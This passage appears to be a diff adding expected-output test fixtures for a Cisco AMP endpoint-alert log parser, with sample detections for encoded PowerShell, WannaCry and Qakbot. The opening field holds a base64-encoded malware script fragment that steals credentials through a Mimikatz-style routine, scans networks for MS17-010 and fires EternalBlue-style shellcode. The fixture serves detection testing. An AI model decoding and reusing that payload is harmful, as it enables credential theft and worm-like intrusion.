BkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==", + "parent_app": "WmiPrvSE.exe", + "parent_app_path": "C:\\Windows\\System32\\wbem", + "parent_pid": 2236, + "parent_puid": 132461352663910600, + "parent_user": "SYSTEM", + "parent_user_sid": "010100000000000512000000", + "pid": 10724, + "puid": 132465072105597400, + "ts": 1602033881727175700, + "user": "user@testdomain.com", + "user_sid": "010100000000000512000000" + } + } + ], + "cisco.amp.bp_data.details.matched_activity.limited": false, + "cisco.amp.bp_data.details.matched_activity.matched": 1, + "cisco.amp.bp_data.details.schema": "endpoint", + "cisco.amp.bp_data.details.schema_epoch": 2, + "cisco.amp.bp_data.details.sig_id": 20190517123456, + "cisco.amp.bp_data.details.sig_rev": 5, + "cisco.amp.bp_data.detection": "apde:20190517123456", + "cisco.amp.bp_data.end_ts": 1610640884, + "cisco.amp.bp_data.engine": "apde", + "cisco.amp.bp_data.id": "d2616Ab846", + "cisco.amp.bp_data.name": "WMIPRVSE Launched Encoded Powershell Command", + "cisco.amp.bp_data.normalized.name": "wmiprvse launched encoded powershell command", + "cisco.amp.bp_data.normalized.observables.file.name": [ + "powershell.exe", + "wmiprvse.exe" + ], + "cisco.amp.bp_data.normalized.observables.file.path": [ + "c:\\windows\\system32\\windowspowershell\\v1.0", + "c:\\windows\\system32\\wbem" + ], + "cisco.amp.bp_data.observables.file": [ + { + "md5": "a575a7610e5f003cc36df39e07c4ba7d", + "name": "powershell.exe", + "path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", + "properties": { + "copyright": "\u00a9 Microsoft Corporation. All rights reserved.", + "file_version": "10.0.14409.1005", + "product": "Microsoft\u00ae Windows\u00ae Operating System", + "product_version": "10.0.14409.1005" + }, + "sha1": "88e7cdc0b75364418e11b2c53f772085f1b61d1e", + "sha256": "006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218", + "size": 443392, + "type_id": 1 + }, + { + "md5": "d683c112190f4b4c6d477d693ee88e35", + "name": "WmiPrvSE.exe", + "path": "C:\\Windows\\System32\\wbem", + "properties": { + "copyright": "\u00a9 Microsoft Corporation. All rights reserved.", + "file_version": "10.0.14409.1005", + "product": "Microsoft\u00ae Windows\u00ae Operating System", + "product_version": "10.0.14409.1005" + }, + "sha1": "67858ead93feed62c0b1865369840e6e8086f53b", + "sha256": "385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334", + "size": 425984, + "type_id": 1 + } + ], + "cisco.amp.bp_data.remediated": false, + "cisco.amp.bp_data.severity": "medium", + "cisco.amp.bp_data.silent": false, + "cisco.amp.bp_data.start_ts": 1610640884, + "cisco.amp.bp_data.tactics": [ + "TA0002", + "TA0005", + "TA0008" + ], + "cisco.amp.bp_data.ts": 1610640884, + "cisco.amp.bp_data.type": "activity", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "be:b0:d5:89:e2:96" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "WMIPRVSE Launched Encoded Powershell Command", + "cisco.amp.event_type_id": 553648222, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.mitre_tactics": [ + "TA0002", + "TA0005", + "TA0008" + ], + "cisco.amp.related.mac": [ + "be:b0:d5:89:e2:96" + ], + "cisco.amp.timestamp_nanoseconds": 810000000, + "event.action": "Threat Detection", + "event.dataset": "cisco.amp", + "event.id": 6880683125978957000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "fileset.name": "amp", + "host.hostname": "Demo_BP_WMIPRVSE", + "host.name": "Demo_BP_WMIPRVSE", + "input.type": "log", + "log.offset": 38130, + "related.hosts": [ + "Demo_BP_WMIPRVSE" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204897366867969", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 717000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 68391, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179204872503298", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 686000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 69603, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847665", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 686000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 70815, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204897366867977", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 639000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 72027, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419247189909831755", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 888000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 73239, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419247189909831754", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 888000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 74476, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419247189909831753", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 873000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "qeriuwjhrf", + "file.path": "\\\\?\\C:\\Windows\\qeriuwjhrf", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 75732, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419229327140847658", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 732000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 76965, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:24:25.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412604589194870787", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 994000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412604589194871000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 81932, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:24:25.000Z", + "cisco.amp.computer.active": true, + 